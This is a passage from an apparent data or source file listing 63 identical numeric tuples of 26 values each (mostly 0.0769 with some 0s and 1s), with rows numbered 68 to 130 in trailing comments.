(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 68
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 69
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 70
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 71
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 72
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 73
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 74
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 75
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 76
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 77
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 78
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 79
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 80
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 81
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 82
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 83
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 84
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 85
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 86
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 87
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 88
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 89
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 90
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 91
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 92
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 93
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 94
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 95
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 96
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 97
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 98
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 99
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 100
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 101
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 102
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 103
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 104
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 105
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 106
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 107
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 108
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 109
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 110
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 111
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 112
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 113
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 114
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 115
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 116
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 117
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 118
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 119
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 120
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 121
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 122
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 123
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 124
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 125
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 126
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 127
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 128
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 129
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 130
